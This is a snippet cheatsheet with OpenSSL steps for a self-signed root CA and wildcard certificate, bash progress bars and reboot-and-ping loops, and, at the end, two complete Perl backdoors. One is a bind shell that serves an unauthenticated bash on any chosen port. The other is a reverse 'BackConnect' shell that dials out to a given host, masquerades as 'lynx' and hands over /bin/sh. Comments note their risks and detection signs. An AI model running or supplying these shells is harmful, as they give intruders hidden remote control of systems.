
How to create a wildcard certificate signed by your own self-signed root CA. [cheatsheet]


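# Root CA: private key plus a self-signed certificate valid for 3650 days.
# rootCA.key is written unencrypted; keep it readable by its owner only
# (e.g. chmod 600 rootCA.key) and off the servers that serve the site cert,
# because whoever holds it can issue certificates your clients will trust.
openssl genrsa -out rootCA.key 2048
# -sha256 instead of -sha1: SHA-1 is no longer collision-resistant and many
# current TLS stacks refuse certificates signed with it.
openssl req -x509 -new -nodes -sha256 -key rootCA.key -days 3650 -out rootCA.pem

# Site private key and certificate signing request (CSR).
openssl genrsa -out SITE.key 2048
openssl req -new -key SITE.key -out SITE.csr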

Create a file named SITE.cnf, and put the following inside:

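# Extension file for the site certificate.
# req_extensions is honoured by `openssl req` only; when this file is passed to
# `openssl x509 -extfile`, the section must be selected with `-extensions v3_req`.
[req]
req_extensions = v3_req

[v3_req]
# A leaf certificate must not be usable as a CA.
basicConstraints = CA:FALSE
# digitalSignature is required for (EC)DHE key exchange and TLS 1.3;
# keyEncipherment covers legacy RSA key exchange. dataEncipherment is not
# used by TLS and is left out.
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = @alt_names

[alt_names]
# The wildcard matches exactly one label (a.domain.com, not a.b.domain.com),
# so the bare domain is listed separately.
DNS.1 = domain.com
DNS.2 = *.domain.com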

Finally:

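# Sign the CSR with the root CA.
# -extensions v3_req: `openssl x509` reads extensions only from the section
#   named here (or from the file's default section), so without this flag the
#   subjectAltName/keyUsage entries in [v3_req] are not added to the certificate.
# -sha256: older OpenSSL releases default to a SHA-1 signature.
# NOTE(review): -days 9999 outlives the 3650-day root CA, and Apple platforms
#   (iOS 13 / macOS 10.15 and later) reject TLS server certificates valid for
#   more than 825 days; shorten the validity if such clients must connect.
openssl x509 -req -sha256 -days 9999 -in SITE.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out SITE.crt -extfile SITE.cnf -extensions v3_req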

A handy tool for testing the installed certificate:
gnutls-cli --x509cafile rootCA.pem -p [ssl_service_port] domain.com

simple progress bar in bash script

Example of a simple progress bar in bash script:

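#!/bin/bash
# Fetch http://site/page PAGELOADS times, one request per second, and redraw
# a text progress bar after every request. Each response is saved to a
# timestamped file; responses containing "NATURE" are deleted again, so only
# the pages without that marker are kept. wget output is appended to ./.log.

PAGELOADS=30000
PBAR_LEN=30
# Requests represented by one bar cell. Clamp to 1 so the division in the loop
# cannot hit zero when PAGELOADS is smaller than PBAR_LEN.
PBAR_STEP=$(( PAGELOADS / PBAR_LEN ))
(( PBAR_STEP > 0 )) || PBAR_STEP=1

for (( i = 1; i <= PAGELOADS; i++ )); do
  # One-second timestamp resolution: two requests within the same second
  # would overwrite each other (the sleep below prevents that here).
  fname="$(date +%F-%T).html"
  # NOTE(review): plain http:// gives no integrity protection for the fetched
  # page; use https:// if the endpoint offers it.
  time wget http://site/page -O "$fname" >>.log 2>&1
  grep -q NATURE "$fname" && rm -- "$fname"
  sleep 1

  # simple progress bar for fun:
  clear
  PBAR=$(( i / PBAR_STEP ))
  printf '['
  for (( j = 1; j <= PBAR_LEN; j++ )); do
    if (( j > PBAR )); then
      printf '.'
    else
      printf '*'
    fi
  done
  printf '] [%s/%s]\n' "$i" "$PAGELOADS"
done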

[bash] ping a host until it responds

example:

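# Run as root. For every host listed in ~/mysql-list.txt (one per line):
# flush MySQL tables, reboot, then wait until the host answers ping again
# before moving on to the next one.
# NOTE(review): this logs in directly as root over SSH; where policy allows,
# prefer key-based login as an unprivileged account plus sudo.
mapfile -t hosts < ~/mysql-list.txt
for host in "${hosts[@]}"; do
  [[ -n "$host" ]] || continue
  ssh -t "root@${host}" 'hostname; date; echo "FLUSH TABLES;" | mysql; shutdown -fr now && date; sleep 40'
  sleep 20
  # Redirect stdout first, then stderr, so both are silenced. The short sleep
  # keeps the loop from spinning when ping fails immediately (e.g. DNS error).
  until ping -c1 -W2 "$host" >/dev/null 2>&1; do
    sleep 1
  done
  ping -c1 "$host"
done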

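# Run as root. Reboot srv0001 .. srv0459 one at a time, waiting for each host
# to answer ping again before continuing with the next.
# NOTE(review): this logs in directly as root over SSH; where policy allows,
# prefer key-based login as an unprivileged account plus sudo.
for n in $(seq -w 1 459); do
  host="srv0${n}"
  ssh "root@${host}" 'hostname; date; shutdown -fr now && date; sleep 40'
  sleep 20
  # Redirect stdout first, then stderr, so both are silenced. The short sleep
  # keeps the loop from spinning when ping fails immediately (e.g. DNS error).
  until ping -c1 -W2 "$host" >/dev/null 2>&1; do
    sleep 1
  done
  ping -c1 "$host"
done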

——

bash simple progress counter example
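# Print "<position> / <total>": the 1-based position of the entry named
# "current_user" among the entries of /home/www (0 if absent) and the total
# number of entries. Uses a glob instead of parsing `ls`, so names containing
# whitespace are counted once, and a private loop variable so the USER
# environment variable is not overwritten.
p=0
t=0
for entry in /home/www/*; do
  # An unmatched glob stays literal; skip it (broken symlinks still count).
  [[ -e "$entry" || -L "$entry" ]] || continue
  t=$(( t + 1 ))
  [[ "${entry##*/}" == "current_user" ]] && p=$t
done
echo "$p" "/" "$t"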

perl bind port

#!/usr/bin/perl
# Bind shell: listens on the TCP port given as the first argument and, for
# each accepted connection, forks a child that execs an interactive bash with
# STDIN/STDOUT/STDERR attached to that connection.
#
# Risk: the listener binds INADDR_ANY (every interface) and does no
# authentication or encryption, so any peer that can reach the port gets a
# shell with the privileges of the account running the script.
# Detection: a perl process holding a listening TCP socket, with "bash -i"
# children whose file descriptors 0-2 are sockets rather than a tty.

# Command exec'd for every connection.
$SHELL="/bin/bash -i";
# Exit with status 1 (no message) when no port argument is given.
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
# SO_REUSEADDR lets the port be bound again right after a restart.
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
# Backlog of 3 pending connections.
listen(S,3) || die "Cant listen port\n";
# Accept loop. The parent never closes CONN and never waits for its children.
while(1)
{
accept(CONN,S);
# Entered in the child (fork returned 0) and also when fork failed (undef).
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
# Point the child's standard streams at the accepted connection.
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
# exec is a list operator, so this parses as exec($SHELL || die ...); $SHELL
# is always true, so the die clause is never evaluated. The two lines after
# it run only if exec itself fails.
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

——
#!/usr/bin/perl
# Reverse ("back-connect") shell: opens an outbound TCP connection to the host
# and port given as the first and second arguments, then runs /bin/sh with its
# standard streams attached to that socket.
#
# Risk: the traffic is a plain TCP stream with no authentication or
# encryption, and the connection is outbound, so inbound-only firewall rules
# do not block it.
# Detection: the script overwrites $0, so process listings may show "lynx";
# check the process's real executable (perl) and look for an /bin/sh child
# whose file descriptors 0-2 are a socket.
use Socket;
# Name written into $0 below.
$cmd= "lynx";
# Shell command run once connected: prints a banner, `uname -a` and `id`,
# then starts /bin/sh.
$system= 'echo "BackConnect";echo "`uname -a`";echo "`id`";/bin/sh';
# Replace the program name reported for this process.
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
# Resolve the target and build the packed socket address; die on failure.
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
# Duplicate the socket onto all three standard streams (STDIN is opened with
# the same ">&" mode as the output streams).
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
# system() runs the command via the shell and returns when /bin/sh exits.
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);